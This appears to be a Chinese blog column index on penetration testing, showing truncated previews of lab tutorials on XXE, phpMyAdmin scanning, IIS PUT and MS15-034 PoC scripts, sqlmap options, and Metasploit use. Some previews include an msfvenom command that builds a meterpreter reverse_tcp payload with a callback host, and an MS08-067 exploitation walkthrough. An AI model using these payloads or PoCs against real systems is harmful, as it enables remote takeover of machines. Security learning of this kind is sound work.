
渗透测试
文章平均质量分 94
0xSecz
代码审计,web安全,渗透测试
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
XXE从0到1
XXE从0到1 1. XXE概述 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。 下面我们主要介绍PHP语言下的XXE攻击. 1.1 XML基础 XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储。 1.1.1文档结构 XML文档结构包括...原创 2021-06-09 22:44:00 · 256 阅读 · 0 评论 -
phpmyadmin批量检测工具
#coding=utf-8 import requests url = "dict.txt" print("phpmyadmin目录扫描器") filpath = "/phpMyAdmin/" with open(url,'r') as f: for line in f.readlines(): line = line.strip() r_url = "http://" + line + filpath r = requests.get(r_url).原创 2020-06-03 01:02:04 · 1204 阅读 · 0 评论 -
IP反查域名数据
渗透测试做信息收集时候,需要爬取同网站IP的其他站点,进行渗透 代码是python3写的 import requests from bs4 import BeautifulSoup import csv def getHtml(url): try: headers = { "Use-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chro原创 2020-05-22 15:31:57 · 830 阅读 · 0 评论 -
iis put漏洞poc
# coding=utf-8 import requests # proxy='127.0.0.1:8080' #本地代理 # proxies={ # 'http':'http://'+proxy, #http发送到127.0.0.1:8080 # 'https':'https://'+proxy #https发送到127.0.0.1:8080 # } url = "http://192.168.64.131:8001/" r = requests.options(url) resu原创 2020-05-23 11:16:57 · 835 阅读 · 0 评论 -
ms15_034漏洞poc脚本
ms15_034漏洞poc脚本 环境python3编写的: # coding=utf-8 import requests url = "http://192.168.64.129:8001/" r = requests.get(url) print(r.headers) remote_server = r.headers["Server"] if remote_server.find('IIS/7.5') or remote_server.find('IIS/8.0'): payload = {'H原创 2020-05-23 11:15:57 · 595 阅读 · 2 评论 -
sqlmap进阶
–level [1,2,3,4,5]:探测等级 level 2:或测试cookie,进行自动破解 level3:测试HTTP User-Agent,Referer等头部信息 –is-dba:验证当前用户是否为管理员权限 若为管理员,则结果为Ture;反之则为False –referer:HTTP Referer头 当level为3或大于3时,会尝试referer注入,可以使用–referer伪造HTTP中的Referer,如: –referer http://www.baidu.com 参数:–os-cmd原创 2020-05-10 21:13:12 · 491 阅读 · 0 评论 -
Powershell 配合msf无文件攻击
生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1121 -f psh-reflection >x.ps1 放到VPS上,这里我们放到本机搭建的apache环境中 kali设置监听,并且启动 win7中访问木马是否成功 直接在win7的cmd中执行命令 powersh...原创 2020-04-27 12:48:15 · 1817 阅读 · 2 评论 -
msf常用模块
运行msfconsole 即可打开msf命令控制接口 whois查询: msf > whois example.com msf> whois 192.168.1.100 常用模块: 查找模块:search 模块名称 查看模块选项:options 清除选项:unset postscan 端口扫描 smb_version 模块(文件共享,端口号445) mssql_ping...原创 2020-04-24 10:08:20 · 3083 阅读 · 0 评论 -
ms08-067复现
nmap扫描系统存在的漏洞,扫描系统信息 nmap --script=vuln 192.168.64.137检查是否存在常见漏洞 nmap -O 检测系统版本 启动msfconsole,search查找ms08-067攻击模块,并且使用 设置payload set payload windows/meterpreter/reverse_tcp 直接run 可以看到跳转到了meterpret...原创 2020-04-24 10:04:01 · 232 阅读 · 0 评论